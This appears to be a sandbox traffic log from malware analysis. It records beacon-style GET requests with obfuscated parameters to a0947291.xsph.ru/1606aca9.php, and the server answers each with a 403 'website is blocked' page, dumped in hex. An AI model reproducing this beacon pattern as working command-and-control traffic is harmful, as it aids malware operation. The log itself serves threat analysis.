3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}
                                                Apr 25, 2024 10:20:46.602761984 CEST1289INData Raw: 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69
                                                Data Ascii: .wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:
                                                Apr 25, 2024 10:20:46.602832079 CEST1289INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e
                                                Data Ascii: e{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;heigh
                                                Apr 25, 2024 10:20:46.602914095 CEST1289INData Raw: 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 68 74 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65
                                                Data Ascii: ace:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77
                                                Apr 25, 2024 10:20:46.602958918 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:20:46.602998018 CEST1289INData Raw: 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 36 33 2e 39 30 38 37 20 31 39 36 2e 36 37 35 20 36 33 2e 35 32 36 38 20 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 5a 22
                                                Data Ascii: 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 1
                                                Apr 25, 2024 10:20:46.603035927 CEST1289INData Raw: 32 2e 31 36 34 20 39 36 2e 31 37 38 34 20 31 34 31 2e 32 30 38 20 39 37 2e 31 33 33 31 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 33 39 2e 31 30 34 20 39 32 2e 33 36 30 35 4c 31
                                                Data Ascii: 2.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fi
                                                Apr 25, 2024 10:20:46.603072882 CEST1289INData Raw: 30 32 20 39 39 2e 39 39 39 31 20 32 39 34 2e 30 32 39 20 39 39 2e 39 39 39 31 20 32 39 33 2e 34 35 35 20 31 30 30 2e 33 38 31 43 32 39 30 2e 33 39 35 20 31 30 33 2e 34 33 36 20 32 38 37 2e 31 34 33 20 31 30 36 2e 34 39 31 20 32 38 34 2e 30 38 33
                                                Data Ascii: 02 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.
                                                Apr 25, 2024 10:20:46.603162050 CEST1289INData Raw: 36 39 2e 31 30 30 39 20 36 37 2e 33 34 36 36 20 37 35 2e 30 33 30 31 20 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34
                                                Data Ascii: 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527
                                                Apr 25, 2024 10:20:46.603199005 CEST1289INData Raw: 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 31 32 39 2e 37 38 37 20 31 32 2e 36 37 37 37 20 31 33 30 2e 31 36 39 43 31 33 2e 30 36
                                                Data Ascii: 5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135.898C13.4427 138.38 17.4593 1
                                                Apr 25, 2024 10:20:46.844353914 CEST1289INData Raw: 32 36 2e 38 34 38 20 36 37 2e 35 37 30 38 20 33 32 38 2e 31 38 35 43 37 32 2e 39 32 36 32 20 33 32 39 2e 39 30 33 20 37 39 2e 30 34 36 37 20 33 32 39 2e 31 33 39 20 38 34 2e 34 30 32 31 20 33 32 37 2e 38 30 33 43 38 39 2e 35 36 36 32 20 33 32 36
                                                Data Ascii: 26.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.17C123.42 308.708 123.42 314.054 123.803 319.592C123.42 319.401 123.229 319.401 12
                                                Apr 25, 2024 10:20:47.087306976 CEST492OUTGET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:20:47.328764915 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.449748141.8.194.7480
                                                TimestampBytes transferredDirectionData
                                                Apr 25, 2024 10:21:02.191961050 CEST619OUTGET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/css
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:21:02.434752941 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:21:02 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}
                                                Apr 25, 2024 10:21:02.434835911 CEST1289INData Raw: 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69
                                                Data Ascii: .wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:
                                                Apr 25, 2024 10:21:02.434859991 CEST1289INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e
                                                Data Ascii: e{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;heigh
                                                Apr 25, 2024 10:21:02.434899092 CEST1289INData Raw: 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 68 74 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65
                                                Data Ascii: ace:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77
                                                Apr 25, 2024 10:21:02.434937000 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:21:02.435004950 CEST1289INData Raw: 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 36 33 2e 39 30 38 37 20 31 39 36 2e 36 37 35 20 36 33 2e 35 32 36 38 20 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 5a 22
                                                Data Ascii: 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 1
                                                Apr 25, 2024 10:21:02.435060978 CEST1289INData Raw: 32 2e 31 36 34 20 39 36 2e 31 37 38 34 20 31 34 31 2e 32 30 38 20 39 37 2e 31 33 33 31 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 33 39 2e 31 30 34 20 39 32 2e 33 36 30 35 4c 31
                                                Data Ascii: 2.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fi
                                                Apr 25, 2024 10:21:02.435105085 CEST1289INData Raw: 30 32 20 39 39 2e 39 39 39 31 20 32 39 34 2e 30 32 39 20 39 39 2e 39 39 39 31 20 32 39 33 2e 34 35 35 20 31 30 30 2e 33 38 31 43 32 39 30 2e 33 39 35 20 31 30 33 2e 34 33 36 20 32 38 37 2e 31 34 33 20 31 30 36 2e 34 39 31 20 32 38 34 2e 30 38 33
                                                Data Ascii: 02 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.
                                                Apr 25, 2024 10:21:02.435142040 CEST1289INData Raw: 36 39 2e 31 30 30 39 20 36 37 2e 33 34 36 36 20 37 35 2e 30 33 30 31 20 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34
                                                Data Ascii: 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527
                                                Apr 25, 2024 10:21:02.435184002 CEST1289INData Raw: 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 31 32 39 2e 37 38 37 20 31 32 2e 36 37 37 37 20 31 33 30 2e 31 36 39 43 31 33 2e 30 36
                                                Data Ascii: 5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135.898C13.4427 138.38 17.4593 1
